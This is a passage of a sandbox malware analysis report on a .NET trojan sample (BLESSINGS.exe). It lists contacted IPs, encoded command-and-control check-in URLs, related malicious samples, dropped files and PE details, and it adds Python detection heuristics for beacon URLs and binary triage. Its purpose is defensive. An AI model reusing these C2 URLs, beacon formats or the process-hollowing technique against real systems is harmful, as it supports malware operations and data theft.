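        ts, client, method, url, _status = line.split()
        if method == "GET" and is_checkin(url, path, hosts):
            hits.append((ts, client, url))
    return hits


PROXY_LOG = [  # constructed
    "2021-01-13T21:30:01Z 10.0.0.5 GET http://www.fontbureau.com/designers 200",
    "2021-01-13T21:30:07Z 10.0.0.5 GET http://www.quintred.com/jqc/?CZ=GWrWoWa4zZjFn82G+0nNh4GvWCUBG1oNYElUd01Cxs8I6tEnxSPY6FoFnAuUsLE3P+RrU5FSoA==&sv28R0=gnKTZf8P 200",
    "2021-01-13T21:30:09Z 10.0.0.5 GET http://www.quintred.com/ 200",
]

if __name__ == "__main__":
    path = campaign_path(MEMORY_STRINGS)
    hosts = hosts_with_path(MEMORY_STRINGS, path)
    print(path, sorted(hosts))
    for hit in scan_proxy_log(PROXY_LOG, path, hosts):
        print("check-in:", *hit)
```

Matching on host, path and query shape together keeps a bare visit to a parked domain (the third constructed line) out of the results, while the fused "/jqc/www.next.host" strings let the host list grow beyond the domains the sandbox actually contacted.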

                                    Contacted IPs


                                    Public

IP | Domain | Country | ASN | ASN Name | Malicious
91.195.241.137 | unknown | Germany | 47846 | SEDO-ASDE | true

                                    General Information

                                    Joe Sandbox Version:31.0.0 Red Diamond
                                    Analysis ID:339345
                                    Start date:13.01.2021
                                    Start time:21:23:17
                                    Joe Sandbox Product:CloudBasic
                                    Overall analysis duration:0h 11m 38s
                                    Hypervisor based Inspection enabled:false
                                    Report type:light
                                    Sample file name:BLESSINGS.exe
                                    Cookbook file name:default.jbs
                                    Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                    Number of analysed new started processes analysed:27
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 1
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.troj.evad.winEXE@7/2@3/1
EGA Information: Failed
HDC Information:
• Successful, ratio: 13.3% (good quality ratio 11.9%)
• Quality average: 72.2%
• Quality standard deviation: 32%
HCA Information:
• Successful, ratio: 97%
• Number of executed functions: 0
• Number of non-executed functions: 0
Cookbook Comments:
• Adjust boot time
• Enable AMSI
• Found application associated with file extension: .exe
Warnings:
                                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe, wuapihost.exe
                                    • Excluded IPs from analysis (whitelisted): 52.255.188.83, 168.61.161.212, 51.11.168.160, 92.122.213.194, 92.122.213.247, 2.20.142.210, 2.20.142.209, 51.103.5.159, 52.155.217.156, 20.54.26.129, 23.210.248.85
                                    • Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, arc.msn.com.nsatc.net, a1449.dscg2.akamai.net, wns.notify.windows.com.akadns.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, arc.msn.com, db5eap.displaycatalog.md.mp.microsoft.com.akadns.net, par02p.wns.notify.windows.com.akadns.net, emea1.notify.windows.com.akadns.net, audownload.windowsupdate.nsatc.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net, displaycatalog-europeeap.md.mp.microsoft.com.akadns.net, client.wns.windows.com, fs.microsoft.com, displaycatalog.md.mp.microsoft.com.akadns.net, ris-prod.trafficmanager.net, skypedataprdcolcus17.cloudapp.net, ctldl.windowsupdate.com, e1723.g.akamaiedge.net, a767.dscg3.akamai.net, ris.api.iris.microsoft.com, skypedataprdcoleus17.cloudapp.net, blobcollector.events.data.trafficmanager.net

                                    Simulations

                                    Behavior and APIs

Time       Type              Description
21:24:17   API Interceptor   192x Sleep call for process: BLESSINGS.exe modified

                                    Joe Sandbox View / Context

                                    IPs

Match: 91.195.241.137
Associated sample name / URL (detection), followed by the context URL that analysis contacted:
cGLVytu1ps.exe (malicious)
• www.classifoods.com/oean/?-Z_PiP=tlpEk5YekAb67KL2xlIEZIOmNCoa9q/Djdc+1mnIPyvO86vAXdVTuD4+MBqszqjRaeD5&DxoHn=2dmDC
AOA4sx8Z7l.exe (malicious)
• www.rickettes.com/c8so/?Wx=nr13ryrphK0zlVsXiKvBnhVbi2g9KzOxyG/5i6d6/itGVNMIJOgEnWNtcgBznYTvqCjN&vB=lhr0E
Doc_74657456348374.xlsx.exe (malicious)
• www.defendertools.com/hpg3/?C0D=_DK4YF6&b8=zHX/nmfsF2jpuhEInZeCqq2GVgZZL3mtp8n3HsHw+mqNo1ANa4F80opyPi8dR1VNXBNhng6QAg==
Shipping Documents PL&BL Draft.exe (malicious)
• www.riqinxin.com/h3qo/?mvHpc=93uRhCEwEUrVxxSjD+1b7A9hC/wpsrLkGIubP/xXjIPRWK+AIZW10n7E32UYS1kyVof9&sPj8=mh84WN0PyZRt
zz4osC4FRa.exe (malicious)
• www.tueddur.com/oean/?1ba0AP=BB3DgipVrPXVUiW5UQyK0nVxujvhMnc98thgbH7+/hDQNSDSTCs9gH0Ux4g93clBab5W&uHrt=FdiDzjvx
btVnDhh5K7.exe (malicious)
• www.eggsmission.com/oean/?wxl=3k/zNET3fDBgs70PCwEkAozdXz/XsTdoJbX3JEkHEqIeGwjgimGxO6vnXb2/67RN1xF5&Tj=YvFHu
4wCFJMHdEJ.exe (malicious)
• www.classifoods.com/oean/?lTB=tlpEk5YekAb67KL2xlIEZIOmNCoa9q/Djdc+1mnIPyvO86vAXdVTuD4+MBqszqjRaeD5&Bvg=yL0LRZtXKrL
SecuriteInfo.com.Trojan.Inject4.6535.29715.exe (malicious)
• www.metanoria.com/kgw/?bn=yVFP8nI8&iN9tKjex=rooDW/IWxvqP4FsNUlFVETkjioyNarIrVVTP+1Jd9BYlAChzvHXiPw+dal/TLdMzQ7Xw
SKM_C258201001130020005057.exe (malicious)
• www.enavaorganics.com/qef6/?D0G=CSX4d1pD2kLRKFDlO4tCA0cLgGHmTgpjHEbnWeNZOOkUyG5Q5sUwopSNN7KMXAMbmA9R&Q2J=fjlpdDePPPndHZ
rtgs_pdf.exe (malicious)
• www.pupupe.com/s9zh/?mL08q=KcsxgP2BsJzkyTBY2N6MxixNQfHgE9YzGEqQ52gopDMMJk8LrwDCUP+qDvHfmPWsuiRw&9rn=DhodLVupGVRTP
P.O-45.exe (malicious)
• www.pupupe.com/s9zh/?RHR=KcsxgP2BsJzkyTBY2N6MxixNQfHgE9YzGEqQ52gopDMMJk8LrwDCUP+qDsnPpuGUwH43&3f=YnOlnZfXtJb
order FTH2004-005.exe (malicious)
• www.pupupe.com/s9zh/?EPq8iH=KcsxgP2BsJzkyTBY2N6MxixNQfHgE9YzGEqQ52gopDMMJk8LrwDCUP+qDsnPpuGUwH43&CX6pD=7n9piL3
invv.exe (malicious)
• www.fwk.xyz/hko6/?2d=onela&-Z2hnx=6iCdWQChhF1B2ngEJZJ/gKGrjnSNWRrW9r5tJ02nK9H7mFxzcWn79b1voLyujwr0K/Rr
ins.exe (malicious)
• www.fwk.xyz/hko6/?FDHH=6iCdWQChhF1B2ngEJZJ/gKGrjnSNWRrW9r5tJ02nK9H7mFxzcWn79b1voLyujwr0K/Rr&Rb=Vtx06
http://exform.com/flbookcounter/bookid.php (malicious)
• exform.com/search/tsc.php?200=MjExNzU4NDg5&21=ODQuMTcuNTIuMjU=&681=MTYwNzQ0NTA1Mzc4YjJkNzdjZGVlMDEwNTdhMGE1MTc5MjdmYjY2YTk2&crc=99325bc99b2534dbb1e8ae9053770a91bbe8417c&cv=1
http://moviejoy.to (malicious)
• moviejoy.to/
PO11272020.xlsx (malicious)
• www.gedefo.com/zsh/
ptFIhqUe89.exe (malicious)
• www.bostonrealestate.club/mfg6/?EZxHcv=idCXUjVPw&X2MdRr9H=/yqXkG2lSpYuwVXBVRCnSHuV3ulBryT1KsOGiBOC3E9h0rTdOIqyr7GAs5aIBhUmKjlm
EME.39134.xlsx (malicious)
• www.oyagu.com/mfg6/?rF=_HCtZ4&yzux_nSp=cnnW0LVOybN2chQ+0+pD4+tuKDmdXLYWsjvHUhFw4C6tCTmFc0h1VdXTZsfKhcluhQRUVw==
Tyre Pricelist.xlsx (malicious)
• www.pestigenix.com/kgw/?UL0tlN9h=3DxvAc+RnyJZYPd+jiD/A7jyp+1eDPaflq2WzCVhzhMiI/AcsKs8L0UbA7cJFll24IqQXw==&_L30=xTm4lrNPut
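Most context URLs above share one shape: a `www.` host, a single path segment of three or four lowercase alphanumerics, and exactly two query parameters with short opaque names, one of which carries a long base64-like blob. The few entries that do not fit (a `.php` path with five parameters, a bare `/`, a path with no query) are easy to separate on that shape alone. The Python below is an added example and not part of the Joe Sandbox report: the matching rules are a heuristic derived from the URLs in this table, not a published FormBook signature, and the test set is constructed from those same URLs (the three non-matching ones are kept in deliberately as negatives).

```python
import re
from urllib.parse import urlsplit

# Constructed test set, copied from the context table above. The first four
# have the GET check-in shape; the last three lack it and must not match.
SAMPLE_URLS = [
    "www.classifoods.com/oean/?-Z_PiP=tlpEk5YekAb67KL2xlIEZIOmNCoa9q/Djdc+1mnIPyvO86vAXdVTuD4+MBqszqjRaeD5&DxoHn=2dmDC",
    "www.defendertools.com/hpg3/?C0D=_DK4YF6&b8=zHX/nmfsF2jpuhEInZeCqq2GVgZZL3mtp8n3HsHw+mqNo1ANa4F80opyPi8dR1VNXBNhng6QAg==",
    "www.fwk.xyz/hko6/?2d=onela&-Z2hnx=6iCdWQChhF1B2ngEJZJ/gKGrjnSNWRrW9r5tJ02nK9H7mFxzcWn79b1voLyujwr0K/Rr",
    "www.oyagu.com/mfg6/?rF=_HCtZ4&yzux_nSp=cnnW0LVOybN2chQ+0+pD4+tuKDmdXLYWsjvHUhFw4C6tCTmFc0h1VdXTZsfKhcluhQRUVw==",
    "exform.com/search/tsc.php?200=MjExNzU4NDg5&21=ODQuMTcuNTIuMjU=&681=MTYwNzQ0NTA1Mzc4YjJkNzdjZGVlMDEwNTdhMGE1MTc5MjdmYjY2YTk2&crc=99325bc99b2534dbb1e8ae9053770a91bbe8417c&cv=1",
    "moviejoy.to/",
    "www.gedefo.com/zsh/",
]

# Heuristic shape, an assumption derived from the listed URLs rather than a
# published signature: one short alphanumeric path segment, exactly two query
# parameters with short opaque names, and at least one long base64-like value.
PATH_RE = re.compile(r"^/[a-z0-9]{3,4}/$")
KEY_RE = re.compile(r"^[A-Za-z0-9_-]{1,8}$")
BLOB_RE = re.compile(r"^[A-Za-z0-9+/]{48,}={0,2}$")


def split_query(query):
    """Split a raw query string on '&' and on the first '=' of each pair.

    urllib.parse.parse_qsl is deliberately not used: it rewrites '+' as a
    space and percent-decodes, which would corrupt the blob before matching.
    """
    pairs = []
    for part in query.split("&"):
        if not part:
            continue
        key, _, value = part.partition("=")
        pairs.append((key, value))
    return pairs


def is_formbook_beacon(url):
    """True if url has the GET check-in shape seen in the context table."""
    if "://" not in url:
        url = "http://" + url  # table entries carry no scheme
    parts = urlsplit(url)
    if not PATH_RE.match(parts.path):
        return False
    pairs = split_query(parts.query)
    if len(pairs) != 2:
        return False
    if not all(KEY_RE.match(key) for key, _ in pairs):
        return False
    return any(BLOB_RE.match(value) for _, value in pairs)


def triage(urls):
    """Return the subset of urls matching the heuristic, in input order."""
    return [u for u in urls if is_formbook_beacon(u)]


if __name__ == "__main__":
    for u in SAMPLE_URLS:
        print("MATCH" if is_formbook_beacon(u) else "-    ", u)
```

Run over proxy or DNS-plus-URL logs this is a cheap first filter; it says nothing about the POST leg of the protocol (the bare `www.gedefo.com/zsh/` entry is that path without a query), so a hit should be confirmed against the sandbox context rather than treated as a verdict on its own.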

                                    Domains

                                    No context

                                    ASN

Match: SEDO-ASDE
Associated sample name / URL (detection), followed by the IP in this ASN that analysis contacted:
orden pdf.exe (malicious)
• 91.195.240.94
RFQ RATED POWER 2000HP- OTHERSPECIFICATION.docx.doc (malicious)
• 91.195.240.94
PO#218740.exe (malicious)
• 91.195.240.94
cGLVytu1ps.exe (malicious)
• 91.195.241.137
AOA4sx8Z7l.exe (malicious)
• 91.195.241.137
Doc_74657456348374.xlsx.exe (malicious)
• 91.195.241.137
Consignment Details.exe (malicious)
• 91.195.240.94
Shipping Documents PL&BL Draft.exe (malicious)
• 91.195.241.137
Purchase Order -263.exe (malicious)
• 91.195.240.94
zz4osC4FRa.exe (malicious)
• 91.195.241.137
btVnDhh5K7.exe (malicious)
• 91.195.241.137
4wCFJMHdEJ.exe (malicious)
• 91.195.241.137
SecuriteInfo.com.Trojan.Inject4.6535.29715.exe (malicious)
• 91.195.241.137
Pending PURCHASE ORDER - 47001516.pdf.exe (malicious)
• 91.195.240.94
SKM_C258201001130020005057.exe (malicious)
• 91.195.241.137
order no. 3643.exe (malicious)
• 91.195.240.94
Details!!!!.exe (malicious)
• 91.195.240.94
rtgs_pdf.exe (malicious)
• 91.195.241.137
http://walmartprepaid.com (malicious)
• 91.195.240.136
P.O-45.exe (malicious)
• 91.195.241.137

                                    JA3 Fingerprints

                                    No context

                                    Dropped Files

Match: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe
Other analysed samples that dropped the same file (all detected malicious):
• QP-0766.scr.exe
• order-181289654312464648.exe
• PO_60577.exe
• IMG_73344332#U00e2#U20ac#U00aegpj.exe
• Ziraat Bankasi Swift Mesaji.exe
• Doc#6620200947535257653.exe
• SecuriteInfo.com.Generic.mg.15368412abd71685.exe
• RT-05723.exe
• Dekont.pdf.exe
• cFAWQ1mv83.exe
• I7313Y5Rr2.exe
• SWIFT-COPY Payment advice3243343.exe
• bWVvaTptgL.exe
• umOXxQ9PFS.exe
• BL,IN&PL.exe
• ORDER #0554.exe
• Dekont.pdf.exe
• IMG_84755643#U00e2#U20ac#U00aegpj.exe
• 8WLxD8uxRN.exe
• Quotation.exe

                                                                            Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\BLESSINGS.exe.log
Process: C:\Users\user\Desktop\BLESSINGS.exe
File Type: ASCII text, with CRLF line terminators
Category: dropped
Size (bytes): 1451
Entropy (8bit): 5.345862727722058
Encrypted: false
SSDEEP: 24:ML9E4Ks2eE4O1lEE4UVwPKDE4KhK3VZ9pKhuE4IWUAE4KI6no84G1qE4j:MxHKXeHKlEHU0YHKhQnouHIW7HKjovGm
MD5: 06F54CDBFEF62849AF5AE052722BD7B6
SHA1: FB0250AAC2057D0B5BCE4CE130891E428F28DA05
SHA-256: 4C039B93A728B546F49C47ED8B448D40A3553CDAABB147067AEE3958133CB446
SHA-512: 34EF5F6D5EAB0E5B11AC81F0D72FC56304291EDEEF6D19DF7145FDECAB5D342767DBBC0B4384B8DECB5741E6B85A4B431DF14FBEB5DDF2DEE103064D2895EABB
Malicious: true
Reputation: moderate, very likely benign file
                                                                            Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..3,"PresentationCore, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30319_32\PresentationCore\820a27781e8540ca263d835ec155f1a5\PresentationCore.ni.dll",0..3,"PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30319_32\Presentatio5ae0f00f#\889128adc9a7c9370e5e293f65060164\PresentationFramework.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"WindowsBase, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30319_32\Wi
C:\Users\user\AppData\Local\Temp\AddInProcess32.exe
Process: C:\Users\user\Desktop\BLESSINGS.exe
File Type: PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category: dropped
Size (bytes): 42080
Entropy (8bit): 6.2125074198825105
Encrypted: false
SSDEEP: 384:gc3JOvwWj8Gpw0A67dOpRIMKJ9Yl6dnPU3SERztmbqCJstdMardz/JikPZ+QsPZw:g4JU8g17dl6Iq88MoBd7mFViqM5sL2
MD5: F2A47587431C466535F3C3D3427724BE
SHA1: 90DF719241CE04828F0DD4D31D683F84790515FF
SHA-256: 23F4A2CCDCE499C524CF43793FDA8E773D809514B5471C02FA5E68F0CDA7A10B
SHA-512: E9D0819478DDDA47763C7F5F617CD258D0FACBBBFFE0C7A965EDE9D0D884A6D7BB445820A3FD498B243BBD8BECBA146687B61421745E32B86272232C6F9E90D8
Malicious: true
Antivirus:
• Antivirus: Metadefender, Detection: 0%
• Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:
• Filename: QP-0766.scr.exe, Detection: malicious
• Filename: order-181289654312464648.exe, Detection: malicious
• Filename: PO_60577.exe, Detection: malicious
• Filename: IMG_73344332#U00e2#U20ac#U00aegpj.exe, Detection: malicious
• Filename: Ziraat Bankasi Swift Mesaji.exe, Detection: malicious
• Filename: Doc#6620200947535257653.exe, Detection: malicious
• Filename: SecuriteInfo.com.Generic.mg.15368412abd71685.exe, Detection: malicious
• Filename: RT-05723.exe, Detection: malicious
• Filename: Dekont.pdf.exe, Detection: malicious
• Filename: cFAWQ1mv83.exe, Detection: malicious
• Filename: I7313Y5Rr2.exe, Detection: malicious
• Filename: SWIFT-COPY Payment advice3243343.exe, Detection: malicious
• Filename: bWVvaTptgL.exe, Detection: malicious
• Filename: umOXxQ9PFS.exe, Detection: malicious
• Filename: BL,IN&PL.exe, Detection: malicious
• Filename: ORDER #0554.exe, Detection: malicious
• Filename: Dekont.pdf.exe, Detection: malicious
• Filename: IMG_84755643#U00e2#U20ac#U00aegpj.exe, Detection: malicious
• Filename: 8WLxD8uxRN.exe, Detection: malicious
• Filename: Quotation.exe, Detection: malicious
Reputation: moderate, very likely benign file
Note: AddInProcess32.exe is a .NET Framework binary that normally lives under %WINDIR%\Microsoft.NET\Framework\v4.0.30319\. A copy written to %TEMP% by a .NET loader is the usual host for hollowing, which is why the file itself scores 0% on static AV engines and a "very likely benign" reputation while being flagged malicious by context. When hunting, key on the path (that file name outside the Framework directories) and on the parent process, not on the file hash.
                                                                            Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....Z.Z..............0..X...........w... ........@.. ...................................`.................................Hw..O....... ............f..`>...........v............................................... ............... ..H............text....W... ...X.................. ..`.rsrc... ............Z..............@..@.reloc...............d..............@..B................|w......H........#...Q...................u.......................................0..K........-..*..i....*...r...p.o....,....r...p.o....-..*.....o......o.....$...*.....o....(....(......:...(....o......r...p.o.......4........o......... ........o......s ........o!...s".....s#.......r]..prg..po$.....r...p.o$.....r...pr...po$.........s.........(%.....tB...r...p(&...&..r...p.('...s(.......o)...&..o*....(+...o,.....&...(-....*.......3..@......R...s.....s....(....*:.(/.....}P...*J.{P....o0..

                                                                            Static File Info

                                                                            General

File type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit): 7.56178131875686
TrID:
• Win32 Executable (generic) Net Framework (10011505/4) 49.83%
• Win32 Executable (generic) a (10002005/4) 49.78%
• Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
• Generic Win/DOS Executable (2004/3) 0.01%
• DOS Executable Generic (2002/1) 0.01%
File name: BLESSINGS.exe
File size: 3427840
MD5: 30cb872994e8a0a4a635b06bfbe38006
SHA1: 02e502ef79ea251f04fa9e02dd1d7639e59c7ddc
SHA256: d0b62e121a89ba8e44b4b71a887dd80df1e4fc746dabc200854622e9ed1fa8cb
SHA512: 57bc48f7c2e77d28f13cd52dadeaa24a50a8eafb0316c2b7894e49cbe17fb16f14efe4f7b7568ef3ae40c7e6ec0a07862ec9bd91541be477795f7c113a4816d1
SSDEEP: 98304:p+F0ah/YomABaKJCmwLyxWIyzhIpJj7d29wYG:p+FPheKcqo3+V7
File Content Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...?..N.................B4.........~`4.. ........@.. ........................4...........`................................

                                                                            File Icon

Icon Hash: 00828e8e8686b000

                                                                            Static PE Info

                                                                            General

Entrypoint: 0x74607e
Entrypoint Section: .text
Digitally signed: false
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: 32BIT_MACHINE, EXECUTABLE_IMAGE
DLL Characteristics: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT, HIGH_ENTROPY_VA
Time Stamp: 0x4EC1C53F [Tue Nov 15 01:49:51 2011 UTC]
TLS Callbacks: (none)
CLR (.Net) Version: v4.0.30319
OS Version Major: 4
OS Version Minor: 0
File Version Major: 4
File Version Minor: 0
Subsystem Version Major: 4
Subsystem Version Minor: 0
Import Hash: f34d5f2d4577ed6d9ceec516c1f5a744
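Three of the static fields above are what a triage script checks first on a .NET sample: the 8-bit entropy (7.56 for this 3.4 MB image, which is high for a managed executable), the IMAGE_FILE_HEADER time stamp, and the entrypoint, whose preview in the report opens with `jmp dword ptr [00402000h]` followed by zero bytes. That six-byte `FF 25 <address>` stub is the native entry of every PE32 .NET executable: it jumps through the import address table to `_CorExeMain` in mscoree.dll, and its indirect target (0x402000 here, RVA 0x2000 from the image base) is the IAT slot. The Python below is an added example, not part of the Joe Sandbox report; the image base 0x400000 and the stamp 0x4EC1C53F are the values from the table, while the entry bytes, the byte blob and the 7.2 entropy threshold are constructed or assumed and labelled as such in the code.

```python
import math
import struct
from collections import Counter
from datetime import datetime, timezone


def shannon_entropy(data):
    """8-bit Shannon entropy in bits per byte (0.0 .. 8.0), the measure the
    report labels 'Entropy (8bit)'."""
    if not data:
        return 0.0
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())


def entropy_verdict(h, threshold=7.2):
    """Label an entropy value. The 7.2 cut-off is an assumed triage threshold,
    not a value from the report; a 3.4 MB .NET image at 7.56 sits well above
    it, which points at a large compressed or encrypted payload inside."""
    return "packed/encrypted" if h >= threshold else "plain"


def decode_entry_stub(entry_bytes):
    """Decode the 'FF 25 <abs addr>' stub (jmp dword ptr [addr]) that a PE32
    .NET executable carries at its native entrypoint. Returns the absolute
    address read from the stub, or None if the bytes are not that stub."""
    if len(entry_bytes) < 6 or entry_bytes[:2] != b"\xff\x25":
        return None
    return struct.unpack_from("<I", entry_bytes, 2)[0]


def decode_pe_timestamp(stamp):
    """Render IMAGE_FILE_HEADER.TimeDateStamp (seconds since the Unix epoch)
    as UTC, the way the report prints it. Treat the value as a hint only:
    it is attacker-writable, and newer deterministic .NET builds store a
    hash here rather than a time."""
    return datetime.fromtimestamp(stamp, tz=timezone.utc).strftime("%Y-%m-%d %H:%M:%S UTC")


def triage(entry_bytes, image_base, stamp, blob):
    """Combine the three checks into one result dictionary."""
    target = decode_entry_stub(entry_bytes)
    h = shannon_entropy(blob)
    return {
        "clr_stub": target is not None,
        "stub_target_rva": None if target is None else target - image_base,
        "timestamp": decode_pe_timestamp(stamp),
        "entropy": round(h, 3),
        "verdict": entropy_verdict(h),
    }


# Constructed inputs. ENTRY_BYTES reproduces the report's entrypoint preview:
# the stub 'jmp dword ptr [00402000h]' followed by zero padding (the 00 00
# bytes decode as 'add byte ptr [eax], al', hence the repeated line).
ENTRY_BYTES = b"\xff\x25\x00\x20\x40\x00" + b"\x00" * 26
IMAGE_BASE = 0x400000       # Imagebase from the Static PE Info table
TIME_STAMP = 0x4EC1C53F     # Time Stamp from the Static PE Info table
# Synthetic blob with every byte value equally frequent: the 8.0 maximum.
# A real file's 7.56 is computed over its bytes in exactly the same way.
UNIFORM_BLOB = bytes(range(256)) * 4

if __name__ == "__main__":
    print(triage(ENTRY_BYTES, IMAGE_BASE, TIME_STAMP, UNIFORM_BLOB))
```

On a real file, read the entrypoint bytes at the file offset of RVA 0x34607e (entrypoint minus image base) and feed the whole file to `shannon_entropy`; the stub check alone does not prove the file is managed, so pair it with the presence of the CLR data directory, which the report records as CLR version v4.0.30319.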

                                                                            Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al   (repeated for the rest of the preview: the bytes after the 6-byte stub are 00 00, which disassemble as this instruction)
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al

Data Directories

Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x346028 | 0x53 | .text
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x348000 | 0x62a | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x34a000 | 0xc | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |

Sections

Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x2000 | 0x344084 | 0x344200 | unknown | unknown | unknown | unknown | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rsrc | 0x348000 | 0x62a | 0x800 | False | 0.35595703125 | data | 3.6771719498 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x34a000 | 0xc | 0x200 | False | 0.044921875 | data | 0.101910425663 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name | RVA | Size | Type | Language | Country
RT_VERSION | 0x3480a0 | 0x3a0 | data | |
RT_MANIFEST | 0x348440 | 0x1ea | XML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators | |

Imports

DLL | Import
mscoree.dll | _CorExeMain

Version Infos

Description | Data
Translation | 0x0000 0x04b0
LegalCopyright | Copyright 2008 AIBD4G:CFD:@><<=EI4<8
Assembly Version | 1.0.0.0
InternalName | BLESSINGS.exe
FileVersion | 6.9.12.16
CompanyName | AIBD4G:CFD:@><<=EI4<8
Comments | 4H793ADH@:58D93JC7C3EG
ProductName | I@J9GGA7CBDA=H:I8@
ProductVersion | 6.9.12.16
FileDescription | I@J9GGA7CBDA=H:I8@
OriginalFilename | BLESSINGS.exe

                                                                            Network Behavior

TCP Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jan 13, 2021 21:26:23.389085054 CET | 49755 | 80 | 192.168.2.6 | 91.195.241.137
Jan 13, 2021 21:26:23.433885098 CET | 80 | 49755 | 91.195.241.137 | 192.168.2.6
Jan 13, 2021 21:26:23.436270952 CET | 49755 | 80 | 192.168.2.6 | 91.195.241.137
Jan 13, 2021 21:26:23.436424017 CET | 49755 | 80 | 192.168.2.6 | 91.195.241.137
Jan 13, 2021 21:26:23.481056929 CET | 80 | 49755 | 91.195.241.137 | 192.168.2.6
Jan 13, 2021 21:26:23.510871887 CET | 80 | 49755 | 91.195.241.137 | 192.168.2.6
Jan 13, 2021 21:26:23.510904074 CET | 80 | 49755 | 91.195.241.137 | 192.168.2.6
Jan 13, 2021 21:26:23.511102915 CET | 49755 | 80 | 192.168.2.6 | 91.195.241.137
Jan 13, 2021 21:26:23.511132002 CET | 49755 | 80 | 192.168.2.6 | 91.195.241.137
Jan 13, 2021 21:26:23.555875063 CET | 80 | 49755 | 91.195.241.137 | 192.168.2.6

UDP Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jan 13, 2021 21:24:06.328990936 CET | 56061 | 53 | 192.168.2.6 | 8.8.8.8
